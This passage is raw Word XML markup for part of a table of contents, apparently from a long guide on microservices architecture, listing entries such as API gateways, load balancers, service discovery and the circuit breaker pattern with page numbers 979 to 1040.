                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867920 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>979</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12CD2257" w14:textId="22300CA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Monolithic &amp; Microservices and when to choose which?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867921 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>979</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62AB26BD" w14:textId="37B2B7C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7867922 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>980</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AFA1745" w14:textId="0236EFA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7867923 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>981</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="475BA083" w14:textId="45A3057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7867924 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>983</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21299164" w14:textId="74AEC90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7867925 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>984</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52BB6DF6" w14:textId="4142E96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7867926 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>985</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B765EE4" w14:textId="5174064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7867927 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>987</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07233995" w14:textId="7E0E503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7867928 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>989</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D64BA34" w14:textId="73F33A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7867929 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>992</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C485C1E" w14:textId="7BEDF23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7867930 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>994</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F02D53A" w14:textId="09D689C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7867931 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>996</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7ABABBE1" w14:textId="74D5873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7867932 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>998</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68C68E36" w14:textId="0858853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7867933 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="244AA7FA" w14:textId="5C88B57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7867934 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1003</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F1AED0C" w14:textId="27A1209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7867935 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1005</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2704CD49" w14:textId="4AC27CD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7867936 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1007</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E4440E2" w14:textId="0E60153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7867937 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1010</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B7A165D" w14:textId="6EE7C16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7867938 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1013</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35B8B5CB" w14:textId="552DB22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7867939 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1014</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A22F594" w14:textId="0908D05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7867940 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1016</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A33F785" w14:textId="2C9A7AC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7867941 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1019</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36AB9178" w14:textId="3FDE8C8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7867942 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1020</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EF86EA6" w14:textId="3625F95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7867943 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1022</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BB9D023" w14:textId="36A7ED0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7867944 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1024</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3272B60B" w14:textId="4F30E37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7867945 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1026</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75BE89FA" w14:textId="48505D4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7867946 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1027</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29C02EB0" w14:textId="02F9F4D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PI Gateway?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867947 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1029</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CCBDAF2" w14:textId="6F7BB7B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Load balancer?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867948 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1031</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="439B5AEB" w14:textId="7AEC417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API gateway is single-entry point, then how does it will handle millions of requests per second?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867949 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1032</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39FBBD84" w14:textId="17E3E81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API Gateway is different from Load balancer? Does it come before or after the load balancer?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867950 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1034</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09A24A1F" w14:textId="4C6BA40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PI Composition?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867951 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1034</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32024095" w14:textId="02D6169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ervice Discovery?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867952 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1036</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B746C3F" w14:textId="446C0F4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n microservices architecture what are the benefits of cloud for code development?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867953 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1037</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C6977BD" w14:textId="285E69D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we achieve reliability and availability of microservices in the cloud?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867954 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1039</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5523791B" w14:textId="00C5DEB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isadvantages of Circuit breaker design pattern?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867955 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1040</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
